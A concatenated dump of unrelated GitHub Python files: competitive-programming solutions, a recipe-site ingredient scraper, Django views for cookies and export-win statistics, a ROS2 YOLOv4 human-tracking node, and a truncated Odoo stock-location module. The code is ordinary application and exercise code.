E(1 ≤ E ≤ 100,000)가 주어진다. 다음 E개의 줄에는 각 간선에 대한 정보를 나타내는 세 정수 A, B, C가 주어진다. 이는 A번 정점과 B번 정점이 가중치 C인 간선으로 연결되어 있다는 의미이다. C는 음수일 수도 있으며, 절댓값이 1,000,000을 넘지 않는다.\n\n그래프의 정점은 1번부터 V번까지 번호가 매겨져 있고, 임의의 두 정점 사이에 경로가 있다. 최소 스패닝 트리의 가중치가 -2,147,483,648보다 크거나 같고, 2,147,483,647보다 작거나 같은 데이터만 입력으로 주어진다.\n\n출력\n첫째 줄에 최소 스패닝 트리의 가중치를 출력한다.\n'''\n# 최소신장트리\n\nV,E = map(int, input().split())\n\ncosts = []\nfor i in range(E):\n costs.append(tuple(map(int, input().split())))\n\ncosts.sort(key= lambda x: x[2]) # 가중치가 낮은 순서로 정렬\n\nanswer = 0 # 가중치의 합의 최소\nconnect = set([costs[0][0]]) \n# 최소 신장 트리의 첫 원소로 가중치가 가장 낮은 노드 추가\n\nwhile len(connect) != V: # 최소 신장 트리의 원소가 노드의 총 개수가 될 때까지\n for cost in costs:\n if cost[0] in connect and cost[1] in connect: # 두 원소 모두 이미 트리에 포함되있으면 스킵\n continue\n if cost[0] in connect or cost[1] in connect: # 둘중 하나만 포함되어 있을 경우\n connect.update([cost[0], cost[1]]) # 신장 트리에 추가\n answer += cost[2] # 가중치를 더해줌\n break # for문을 초기화 후 다시 돌림\nprint(answer)\nprint(connect)","repo_name":"JIKMAN/Algorithm","sub_path":"coding_test/bj_1197.py","file_name":"bj_1197.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38796284182","text":"class Solution:\n def findSubsequences(self, nums):\n ans = set()\n\n def dfs(step, track):\n if step > len(nums):\n return\n if len(track) >= 2:\n if track[-1] < track[-2]:\n return\n temp = tuple(track)\n if temp not in ans:\n ans.add(temp)\n for i in range(step, len(nums)):\n track.append(nums[i])\n dfs(i+1, track)\n track.pop()\n dfs(0, [])\n return list(ans)\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/401-500/491-递增子序列.py","file_name":"491-递增子序列.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2237658945","text":"from string import ascii_lowercase\nfrom urllib.request import Request, urlopen\nfrom pyquery import PyQuery\nimport sys\n\n\ndef send_requests(ing_categ):\n url_req_template = \"https://food.ndtv.com/ingredient/{ing_categ}/page-{page}\"\n responses = []\n for page in range(1, 6):\n url = url_req_template.format(ing_categ=ing_categ, page=page)\n try:\n req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n response = urlopen(req).read()\n responses.append(response.decode('latin-1'))\n print(\"Success request to:\", url)\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(\"Failed request to:\", ing_categ, \"Error:\", str(e), \"Line:\", exc_tb.tb_lineno)\n return responses\n\n\ndef send_request(url):\n try:\n req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n response = urlopen(req).read()\n return response.decode('latin-1')\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(\"Failed request to:\", url, \"Error:\", str(e), \"Line:\", exc_tb.tb_lineno)\n return None\n\n\ndef parse():\n url = \"https://food.ndtv.com/ingredient\"\n response = send_request(url)\n ingredients_category = ing_categ_parse(response)\n result = dict()\n for ing_categ in ingredients_category:\n ing = list()\n for ing_page in send_requests(ing_categ):\n try:\n pq = PyQuery(ing_page)(\".vdo_lst\")\n ing.extend([i.text().lower() for i in pq.items(\"li\") if i.text() != \"No Record Found\"])\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(\"Failed to parse page.\", \"Error:\", str(e), \"Line:\", exc_tb.tb_lineno)\n result[ing_categ] = {\"count\":len(ing), \"ing\":ing}\n return result\n\n\ndef ing_categ_parse(response):\n pq = PyQuery(response)(\".vdo_lst\")\n ing_categ = [i.text().lower().replace(\" \", \"-\") for i in pq.items(\"li\")]\n return ing_categ\n","repo_name":"turcunicusor/KunFooD","sub_path":"SourceCode/RecipesParser/food_ndtv_parser.py","file_name":"food_ndtv_parser.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71311785768","text":"from django.http import HttpResponse\n\n\ndef myview(request):\n\n if 'dj4e_cookie' in request.COOKIES:\n\n oldval = request.COOKIES.get('cookie')\n oldval = str(int(oldval)+1)\n resp = HttpResponse(\"view count=\"+(oldval))\n resp.set_cookie('cookie',str(oldval))\n\n else:\n oldval = 1\n resp = HttpResponse(\"view count=\"+str(oldval))\n resp.set_cookie('cookie',str(oldval))\n\n resp.set_cookie('dj4e_cookie', value='b99c61ac', max_age=10)\n return resp\n\n\n\n # if oldval :\n # resp.set_cookie('dj4e_cookie', int(oldval)+1) # No expired date = until browser close\n # else :\n # resp.set_cookie('dj4e_cookie', 42) # No expired date = until browser close\n # resp.set_cookie('dj4e_cookie', 'b99c61ac', max_age=1000) # seconds until expire\n # return resp\n\n # https://www.youtube.com/watch?v=Ye8mB6VsUHw\n\n#def sessfun(request) :\n# num_visits = request.session.get('num_visits', 0) + 1\n# request.session['num_visits'] = num_visits\n# if num_visits > 4 : del(request.session['num_visits'])\n# resp = HttpResponse('view count='+str(num_visits))\n# return resp\n\n\n# def myview(request):\n# print(request.COOKIES)\n# old_value = request.COOKIES['num_views',0]\n# return HttpResponse(\"num_views = \"+str(old_value))\n\n\n\n\n\n\n\n\n","repo_name":"Balasankar1597/Dj4e","sub_path":"hello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21877499585","text":"from itertools import groupby\nfrom operator import attrgetter, itemgetter\n\nfrom django.db.models import Count, Min, Q, Sum\nfrom django_countries.fields import Country as DjangoCountry\n\nfrom mi.models import (\n Sector,\n SectorTeam,\n Target,\n)\nfrom mi.utils import (\n get_financial_start_date,\n month_iterator,\n sort_campaigns_by,\n two_digit_float,\n)\nfrom mi.views.base_view import BaseWinMIView\nfrom wins.models import Notification\n\n\nclass BaseSectorMIView(BaseWinMIView):\n \"\"\" Abstract Base for other Sector-related MI endpoints to inherit from \"\"\"\n\n def _get_team(self, team_id):\n \"\"\" Get SectorTeam object or False if invalid ID \"\"\"\n\n try:\n return SectorTeam.objects.get(id=int(team_id))\n except SectorTeam.DoesNotExist:\n return False\n\n def _team_wins_breakdown(self, sector_team):\n \"\"\" Breakdown of team's HVC, non-HVC and non-export Wins \"\"\"\n\n return self._breakdowns(self._get_all_wins(sector_team))\n\n def _get_group_wins(self, group):\n \"\"\" HVC wins of the HVC Group \"\"\"\n return self._wins().filter(\n hvc__in=group.campaign_ids,\n ).select_related('confirmation')\n\n def _get_hvc_wins(self, team):\n \"\"\"\n HVC wins alone for the `SectorTeam`\n\n A `Win` is considered HVC for this team, when it falls under a Campaign that belongs to this `SectorTeam`\n \"\"\"\n return self._wins().filter(\n hvc__in=team.campaign_ids\n ).select_related('confirmation')\n\n def _get_non_hvc_wins(self, team):\n \"\"\"\n non-HVC wins alone for the `SectorTeam`\n\n A `Win` is a non-HVC, if no HVC was mentioned while recording it\n but it belongs to a CDMS Sector that is within this `SectorTeam`s range\n \"\"\"\n return self._wins().filter(\n Q(sector__in=team.sector_ids),\n Q(hvc__isnull=True) | Q(hvc='')\n ).select_related('confirmation')\n\n def _get_all_wins(self, sector_team):\n \"\"\" Get HVC and non-HVC Wins of a Sector Team \"\"\"\n\n return (list(self._get_hvc_wins(sector_team)) +\n list(self._get_non_hvc_wins(sector_team)))\n\n def _get_avg_confirm_time(self, team):\n \"\"\"\n Average of (earliest CUSTOMER notification created date - customer response date) for given team\n \"\"\"\n\n notifications_qs = Notification.objects.filter(\n type__exact='c',\n win__sector__in=team.sector_ids,\n win__confirmation__isnull=False,\n )\n return self._average_confirm_time(notifications_qs)\n\n def _sector_result(self, team):\n \"\"\" Basic data about sector team - name & hvc's \"\"\"\n\n return {\n 'name': team.name,\n 'avg_time_to_confirm': self._get_avg_confirm_time(team),\n 'hvcs': self._hvc_overview(team.targets.all()),\n }\n\n\nclass TopNonHvcSectorCountryWinsView(BaseSectorMIView):\n \"\"\" Sector Team non-HVC Win data broken down by country \"\"\"\n\n def get(self, request, team_id):\n \"\"\"\n percentComplete is based on the top value being 100%\n averageWinValue is total non_hvc win value for the sector/total number of wins during the financial year\n averageWinPercent is therefore averageWinValue * 100/Total win value for the sector/market\n \"\"\"\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n records_to_retreive = 5\n\n wins = self._wins().filter(\n Q(hvc='') | Q(hvc__isnull=True),\n sector__in=team.sector_ids,\n ).values(\n 'country',\n 'sector'\n ).annotate(\n total_value=Sum('total_expected_export_value'),\n total_wins=Count('id')\n ).order_by('-total_value')[:records_to_retreive]\n\n top_value = int(wins[0]['total_value'])\n\n results = [\n {\n 'region': DjangoCountry(agg_win['country']).name,\n 'sector': Sector.objects.get(id=agg_win['sector']).name,\n 'totalValue': agg_win['total_value'],\n 'totalWins': agg_win['total_wins'],\n 'percentComplete': int(int(agg_win['total_value']) * 100 / top_value),\n 'averageWinValue': int(agg_win['total_value'] / agg_win['total_wins']),\n 'averageWinPercent': int((agg_win['total_value'] / agg_win['total_wins']) * 100 / top_value)\n }\n for agg_win in wins\n ]\n return self._success(results)\n\n\nclass AverageTimeToConfirmView(BaseWinMIView):\n \"\"\" Average number of days to confirm a Win \"\"\"\n\n average_time = 0.0\n\n def get(self, request):\n \"\"\"\n Average of (earliest CUSTOMER notification created date - customer response date)\n \"\"\"\n notifications = Notification.objects.filter(\n type__exact='c',\n win__confirmation__created__isnull=False\n ).annotate(Min('created')).select_related('win__confirmation')\n\n confirm_delay = [(notification.win.confirmation.created - notification.created).days\n for notification in notifications]\n total_days = sum(confirm_delay)\n average_time = total_days / notifications.count()\n\n results = {\n 'average': two_digit_float(average_time),\n }\n return self._success(results)\n\n\nclass SectorTeamsListView(BaseSectorMIView):\n \"\"\" Basic information about all Sector Teams \"\"\"\n\n def _get_hvc_groups_for_team(self, team):\n \"\"\" return sorted list of HVC Groups for a given Sector Team \"\"\"\n\n results = [\n {\n 'id': hvc_group.id,\n 'name': hvc_group.name,\n }\n for hvc_group in team.hvc_groups.all()\n ]\n return sorted(results, key=itemgetter('name'))\n\n def get(self, request):\n results = [\n {\n 'id': sector_team.id,\n 'name': sector_team.name,\n 'hvc_groups': self._get_hvc_groups_for_team(sector_team)\n }\n for sector_team in SectorTeam.objects.all()\n ]\n return self._success(sorted(results, key=itemgetter('name')))\n\n\nclass SectorTeamDetailView(BaseSectorMIView):\n \"\"\" Sector Team name, targets and win-breakdown \"\"\"\n\n def get(self, request, team_id):\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n results = self._sector_result(team)\n results['wins'] = self._team_wins_breakdown(team)\n return self._success(results)\n\n\nclass SectorTeamMonthsView(BaseSectorMIView):\n \"\"\" Sector Team name, hvcs and wins broken down by month \"\"\"\n\n def _month_breakdowns(self, wins):\n month_to_wins = self._group_wins_by_month(wins)\n return [\n {\n 'date': date_str,\n 'totals': self._breakdowns_cumulative(month_wins),\n }\n for date_str, month_wins in month_to_wins\n ]\n\n def _group_wins_by_month(self, wins):\n date_attrgetter = attrgetter('date')\n sorted_wins = sorted(wins, key=date_attrgetter)\n month_to_wins = []\n # group wins by date (month-year)\n for k, g in groupby(sorted_wins, key=date_attrgetter):\n month_wins = list(g)\n date_str = month_wins[0].date.strftime('%Y-%m')\n month_to_wins.append((date_str, month_wins))\n\n # Add missing months within the financial year until current month\n for item in month_iterator(get_financial_start_date()):\n date_str = '{:d}-{:02d}'.format(*item)\n existing = [m for m in month_to_wins if m[0] == date_str]\n if len(existing) == 0:\n month_to_wins.append((date_str, list()))\n\n return sorted(month_to_wins, key=lambda tup: tup[0])\n\n def get(self, request, team_id):\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n results = self._sector_result(team)\n wins = self._get_all_wins(team)\n results['months'] = self._month_breakdowns(wins)\n return self._success(results)\n\n\nclass SectorTeamCampaignsView(BaseSectorMIView):\n \"\"\" Sector Team Wins broken down by individual HVC \"\"\"\n\n def _campaign_breakdowns(self, team):\n\n wins = self._get_hvc_wins(team)\n targets = team.targets.all()\n campaign_to_wins = self._group_wins_by_campaign(wins, targets)\n campaigns = [\n {\n 'campaign': campaign.name.split(':')[0],\n 'campaign_id': campaign.campaign_id,\n 'totals': self._progress_breakdown(campaign_wins, campaign.target),\n }\n for campaign, campaign_wins in campaign_to_wins\n ]\n\n sorted_campaigns = sorted(campaigns, key=sort_campaigns_by, reverse=True)\n return sorted_campaigns\n\n def _group_wins_by_campaign(self, wins, targets):\n hvc_attrgetter = attrgetter('hvc')\n sorted_wins = sorted(wins, key=hvc_attrgetter)\n campaign_to_wins = []\n\n # group existing wins by campaign\n for k, g in groupby(sorted_wins, key=hvc_attrgetter):\n campaign_wins = list(g)\n campaign_to_wins.append((Target.objects.get(campaign_id=k), campaign_wins))\n\n # add remaining campaigns\n for target in targets:\n target_campaign = Target.objects.get(campaign_id=target.campaign_id)\n if not any(target_campaign in campaign_to_win for campaign_to_win in campaign_to_wins):\n campaign_to_wins.append((target_campaign, []))\n\n return campaign_to_wins\n\n def get(self, request, team_id):\n team = self._get_team(team_id)\n if not team:\n return self._invalid('team not found')\n\n results = self._sector_result(team)\n results['campaigns'] = self._campaign_breakdowns(team)\n return self._success(results)\n\n\nclass SectorTeamsOverviewView(BaseSectorMIView):\n \"\"\" Overview of HVCs, targets etc. for each SectorTeam \"\"\"\n\n def _sector_obj_data(self, sector_obj):\n \"\"\" Get general data from SectorTeam or HVCGroup \"\"\"\n\n targets = sector_obj.targets.all()\n hvc_wins = self._get_hvc_wins(sector_obj)\n\n hvc_export_confirmed = sum(w.total_expected_export_value for w in hvc_wins if w.confirmed)\n hvc_export_unconfirmed = sum(w.total_expected_export_value for w in hvc_wins if not w.confirmed)\n total_target = sum(t.target for t in targets)\n\n hvc_colours_count = self._colours(hvc_wins, targets)\n\n return {\n 'id': sector_obj.id,\n 'name': sector_obj.name,\n 'values': {\n 'hvc': {\n 'current': {\n 'confirmed': hvc_export_confirmed,\n 'unconfirmed': hvc_export_unconfirmed\n },\n 'target': total_target,\n 'target_percent': self._overview_target_percentage(hvc_wins, total_target),\n },\n },\n 'hvc_performance': hvc_colours_count,\n }\n\n def _sector_data(self, sector_team):\n \"\"\" Calculate overview for a sector team \"\"\"\n\n result = self._sector_obj_data(sector_team)\n\n hvc_wins = self._get_hvc_wins(sector_team)\n non_hvc_wins = self._get_non_hvc_wins(sector_team)\n non_hvc_confirmed = sum(w.total_expected_export_value for w in non_hvc_wins if w.confirmed)\n non_hvc_unconfirmed = sum(w.total_expected_export_value for w in non_hvc_wins if not w.confirmed)\n hvc_confirmed = result['values']['hvc']['current']['confirmed']\n hvc_unconfirmed = result['values']['hvc']['current']['unconfirmed']\n\n total_win_percent = self._overview_win_percentages(hvc_wins, non_hvc_wins)\n\n totals = {\n 'confirmed': hvc_confirmed + non_hvc_confirmed,\n 'unconfirmed': hvc_unconfirmed + non_hvc_unconfirmed\n }\n\n non_hvc_data = {\n 'total_win_percent': total_win_percent['non_hvc'],\n 'current': {\n 'confirmed': non_hvc_confirmed,\n 'unconfirmed': non_hvc_unconfirmed\n }\n }\n\n result['values']['totals'] = totals\n result['values']['non_hvc'] = non_hvc_data\n result['values']['hvc']['total_win_percent'] = total_win_percent['hvc']\n\n result['hvc_groups'] = [\n self._sector_obj_data(parent)\n for parent in sector_team.hvc_groups.all()\n ]\n return result\n\n def get(self, request):\n result = [self._sector_data(team) for team in SectorTeam.objects.all()]\n return self._success(sorted(result, key=lambda x: (x['name'])))\n","repo_name":"adamchainz/export-wins-backend","sub_path":"mi/views/sector_views.py","file_name":"sector_views.py","file_ext":"py","file_size_in_byte":12800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37571965647","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\nimport sys\n\nimport pynipap\n\nlong_desc = open('README.rst').read()\nshort_desc = long_desc.split('\\n')[0].split(' - ')[1].strip()\n\nsetup(\n name = 'pynipap',\n version = pynipap.__version__,\n description = short_desc,\n long_description = long_desc,\n author = pynipap.__author__,\n author_email = pynipap.__author_email__,\n license = pynipap.__license__,\n url = pynipap.__url__,\n py_modules = ['pynipap'],\n keywords = ['nipap'],\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware'\n ]\n)\n","repo_name":"scoffers/NIPAPP","sub_path":"pynipap/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43446648685","text":"import logging\nfrom pi import *\n\n# Setup logging config\nLOG_FORMAT = \"%(asctime)s (%(levelname)s) - %(message)s @ [%(pathname)s(%(lineno)d)]\"\nlogging.basicConfig(filename='pi.log',\n level = logging.DEBUG,\n format = LOG_FORMAT,\n filemode = 'w')\nlogging.getLogger().addHandler(logging.StreamHandler())\n\np = Pi([])\np.start()\np.run()\n","repo_name":"SCC331Penguins/Pi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5491117214","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 23 14:57:20 2021\n\n@author: pinup1\n\"\"\"\n#used for human tracking\n#tracking will be done for 1 human in the scene only\n\nimport rclpy\nfrom rclpy.node import Node\n#from geometry_msgs.msg import Twist \nfrom geometry_msgs.msg import Point \n#from pic_message.msg import XYCoordinates\n\n\nimport pyrealsense2 as rs\n \nfrom PIL import Image as PILImage\nfrom yolov4 import Detector\n\nimport numpy as np \nimport time\nimport cv2\nimport math\n\nangle1 = 15\nangle2 = 30\n\npath_darknet = \"/home/fabian/yolov4/darknet/\"\n\ncam_list = []\n\ndef testDevice(source):\n cap = cv2.VideoCapture(source)\n \n if cap is None or not cap.isOpened():\n print('Warning: unable to open video source: ', source)\n \n else:\n cam_list.append(source)\ndef get_CamID(): \n for i in range(4):\n testDevice(i)\n print(\"\\ncam list: {}\".format(cam_list))\n return cam_list[-1]\n\nprint(get_CamID())\n\ndef detect_humans(a): \n img = PILImage.fromarray(a) # using frames directly without saving \n print(type(img))\n d = Detector(config_path= path_darknet + 'cfg/yolov4-tiny.cfg', weights_path= path_darknet + 'model_data/yolov4-tiny.weights', gpu_id=1)\n img_arr = np.array(img.resize((d.network_width(), d.network_height())))\n detections = d.perform_detect(image_path_or_buf=img_arr, show_image=True)\n peoplenumber = 0\n maxconfi = 0\n humancoordinate = tuple()\n for detection in detections:\n box = detection.left_x, detection.top_y, detection.width, detection.height\n print(f'{detection.class_name.ljust(10)} | {detection.class_confidence * 100:.1f} % | {box}') \n if detection.class_name == 'person'and detection.class_confidence * 100 >= 50:\n peoplenumber += 1\n if detection.class_confidence >= maxconfi:\n centrecoordinate = (int(detection.left_x + 0.5 * detection.width), int(detection.top_y + 0.5 * detection.height))\n maxconfi = (int(detection.class_confidence*100))\n#coordinate is based on resized image\n \n if peoplenumber == 0:\n humancoordinate = None\n \n elif peoplenumber > 0 :\n maxconfi = detection.class_confidence\n humancoordinate = centrecoordinate\n \n return humancoordinate, maxconfi \n\ndef cartesiantopolar(x,z):\n radius = math.sqrt( x * x + z * z )\n theta = math.atan(x/z) #from center\n theta = 180 * theta/math.pi #get in degrees\n \n return theta, radius \n\n#def fuzzy(x,z):\ndef startstream():\n # Create a context object. This object owns the handles to all connected realsense devices\n pipeline = rs.pipeline()\n \n # Configure streams\n config = rs.config()\n config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 15)\n config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 15)\n #print(\"config set\")\n # Start streaming\n pipeline.start(config)\n \n #print(\"started pipe\")\n\ndef getcoordinates(self):\n# self.pipeline = rs.pipeline()\n\n\n# This call waits until a new coherent set of frames is available on a device\n # Calls to get_frame_data(...) and get_frame_timestamp(...) on a device will return stable values until wait_for_frames(...) is called\n frames = self.pipeline.wait_for_frames()\n# print(\"frames ready\")\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame: \n print(\"error\")\n# print(color_frame)\n \n color_image = np.asanyarray(color_frame.get_data()) #change to numpy to fit detector \n \n stream_vid = color_image.copy()\n # print(\"hi\")\n \n cv2.imshow('clone_stream', stream_vid)\n \n intrin = frames.profile.as_video_stream_profile().intrinsics\n pixel, humanconfi = detect_humans(color_image) #get coordinate of human based on yolov4\n print(\"pixel: \",pixel)\n if pixel == None:\n print(\"no human\")\n self.human = False\n# human = False\n else:\n print(pixel[0],pixel[1])\n rspixel = (int(pixel[0]/608*640),int(pixel[1]/608*480))\n print(\"rspixel: \",rspixel)\n dist = depth_frame.get_distance(rspixel[0],rspixel[1])\n Point = rs.rs2_deproject_pixel_to_point(intrin, rspixel, dist)\n print(\"3D coordinate of this point is: \", Point)\n x,y,z = Point\n if z != 0:\n self.human = True\n# human = True\n self.theta, self.radius = cartesiantopolar(x,z)\n print(\"Polar coordinates: \", \"\\ntheta: \", self.theta, \"\\nradius(m): \",self.radius)\n \n k = cv2.waitKey(5) & 0xFF # Esc key to stop\n if k == 27:\n# self.exit = True\n return True\n\ndef open_video():\n cap = cv2.VideoCapture(get_CamID())\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n return cap\n \n \nclass MinimalPublisher(Node):\n def __init__(self):\n super().__init__('minimal_publisher')\n self.publisher_ = self.create_publisher(Point, 'XY', 10)\n timer_period = 1 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n self.counter = 0\n \n#open camera\n self.cap = open_video()\n \n #print(\"started pipe\")\n# print(\"start stream\")\n self.human = bool()\n self.exit = bool()\n self.x = float(0)\n self.y = float(0)\n \n def timer_callback(self):\n try:\n ret,frame = self.cap.read()\n if not ret:\n print(\"no image\")\n humancoordinate, maxconfi = detect_humans(frame)\n print(\"human confidence: \",maxconfi)\n if maxconfi > 0.5:\n self.human = True\n self.counter = 0\n print(humancoordinate)\n else:\n self.human = False\n self.counter += 1\n if self.human:\n self.x = float(humancoordinate[0])\n self.y = float(humancoordinate[1])\n msg = Point()\n msg.x = float(humancoordinate[0])\n msg.y = float(humancoordinate[1])\n self.publisher_.publish(msg)\n self.get_logger().info('Publishing an cmd vel '+ str(self.human))\n else:\n if self.counter > 5:\n self.get_logger().info(\"published nothing, no human\") \n else:\n msg = Point()\n msg.x = self.x\n msg.y = self.y\n self.publisher_.publish(msg)\n self.get_logger().info('Publishing an cmd vel using prev coordinates '+ str(self.human))\n except KeyboardInterrupt:\n self.cap.release()\n cv2.destroyAllWindows()\n \ndef main(args=None):\n rclpy.init(args=args)\n print(\"initiating pub\")\n print(\"started\")\n time.sleep(5)\n minimal_publisher = MinimalPublisher()\n rclpy.spin(minimal_publisher)\n print('spin done')\n minimal_publisher.destroy_node()\n\n rclpy.shutdown()\n print(\"shutdown\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"fabianraus83/human_following","sub_path":"human_following/XYCoordinateWithUSBCamera_Pub.py","file_name":"XYCoordinateWithUSBCamera_Pub.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40931119292","text":"N = int(input())\nmod = 10**9+7\nA = [int(n)%mod for n in input().split()]\nS = [0 for _ in range(N)]\nS[0] = A[0]\nfor i in range(1,N):\n S[i] = (A[i]+S[i-1])%mod\n\nres = 0\nfor i in range(N):\n res += (A[i]*(S[N-1] - S[i]))%mod\n res %= mod\n\nprint(res)\n","repo_name":"Koheki/TIS","sub_path":"2022-11/2022-11-11/ABC177C.py","file_name":"ABC177C.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4359912932","text":"import openerp.addons.decimal_precision as dp\nfrom openerp.osv import fields, osv, orm\nimport logging\n_logger = logging.getLogger(__name__)\nfrom operator import itemgetter\nfrom itertools import groupby\nfrom openerp import netsvc\n\nimport requests\n\nclass stock_location(osv.osv):\n _inherit = \"stock.location\"\n\n def _product_value_ats(self, cr, uid, ids, field_names, arg, context=None):\n \"\"\"Computes stock value (real and virtual) for a product, as well as stock qty (real and virtual).\n @param field_names: Name of field\n @return: Dictionary of values\n \"\"\"\n prod_id = context and context.get('product_id', False)\n\n if not prod_id:\n return dict([(i, 0.0) for i in ids])\n\n product_product_obj = self.pool.get('product.product')\n\n cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))\n dict1 = cr.dictfetchall()\n cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))\n dict2 = cr.dictfetchall()\n res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))\n products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))\n\n result = dict([(i, 0.0) for i in ids])\n result.update(dict([(i, 0.0) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))\n\n currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id\n currency_obj = self.pool.get('res.currency')\n currency = currency_obj.browse(cr, uid, currency_id, context=context)\n\n\n for loc_id, product_ids in products_by_location.items():\n if prod_id:\n product_ids = [prod_id]\n c = (context or {}).copy()\n c['location'] = loc_id\n for prod in product_product_obj.browse(cr, uid, product_ids, context=c):\n \"\"\"\n if prod.is_kit:\n child_prod = []\n for bom in prod.bom_ids:\n for line in bom.bom_lines:\n child_prod.append(line.product_id)\n child_prod = list(set(child_prod))\n if not child_prod:\n continue\n result[loc_id] += min([p._current_virtual_available for p in child_prod])\n else:\n \"\"\"\n if loc_id not in result:\n result[loc_id] = 0\n result[loc_id] += prod._current_virtual_available\n return result\n\n\n def _product_value(self, cr, uid, ids, field_names, arg, context=None):\n \"\"\"Computes stock value (real and virtual) for a product, as well as stock qty (real and virtual).\n @param field_names: Name of field\n @return: Dictionary of values\n \"\"\"\n prod_id = context and context.get('product_id', False)\n\n if not prod_id:\n return dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])\n\n product_product_obj = self.pool.get('product.product')\n\n cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))\n dict1 = cr.dictfetchall()\n cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))\n dict2 = cr.dictfetchall()\n res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))\n products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))\n\n result = dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])\n result.update(dict([(i, {}.fromkeys(field_names, 0.0)) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))\n #result = super(stock_location, self)._product_value(cr, uid, ids, field_names, arg, context=context)\n\n currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id\n currency_obj = self.pool.get('res.currency')\n currency = currency_obj.browse(cr, uid, currency_id, context=context)\n for loc_id, product_ids in products_by_location.items():\n if prod_id:\n product_ids = [prod_id]\n c = (context or {}).copy()\n c['location'] = loc_id\n for prod in product_product_obj.browse(cr, uid, product_ids, context=c):\n #Issue 203\n if prod.is_kit:\n child_prod = []\n for bom in prod.bom_ids:\n #bom type is phantom\n #TODO take care of the valid date of the components\n #if bom.type == 'phantom':\n for line in bom.bom_lines:\n child_prod.append(line.product_id)\n child_prod = list(set(child_prod))\n if not child_prod:\n continue\n for f in field_names:\n if f == 'stock_real':\n if loc_id not in result:\n result[loc_id] = {}\n result[loc_id][f] += min([p.qty_available for p in child_prod])\n elif f == 'stock_virtual':\n result[loc_id][f] += prod.virtual_available\n result[loc_id][f] += min([p.virtual_available for p in child_prod])\n elif f == 'stock_real_value':\n result[loc_id][f] += min([currency_obj.round(cr, uid, currency, p.qty_available * p.standard_price) for p in child_prod])\n elif f == 'stock_virtual_value':\n result[loc_id][f] += min([currency_obj.round(cr, uid, currency, p.virtual_available * p.standard_price) for p in child_prod])\n else:\n for f in field_names:\n if f == 'stock_real':\n if loc_id not in result:\n result[loc_id] = {}\n result[loc_id][f] += prod.qty_available\n elif f == 'stock_virtual':\n result[loc_id][f] += prod.virtual_available\n elif f == 'stock_real_value':\n amount = prod.qty_available * prod.standard_price\n amount = currency_obj.round(cr, uid, currency, amount)\n result[loc_id][f] += amount\n elif f == 'stock_virtual_value':\n amount = prod.virtual_available * prod.standard_price\n amount = currency_obj.round(cr, uid, currency, amount)\n result[loc_id][f] += amount\n \n return result\n\n _columns = {\n 'stock_ats': fields.function(_product_value_ats, type='float', string='ATS Stock',),\n 'stock_real': fields.function(_product_value, type='float', string='Real Stock', multi=\"stock\"),\n 'stock_virtual': fields.function(_product_value, type='float', string='Virtual Stock', multi=\"stock\"),\n 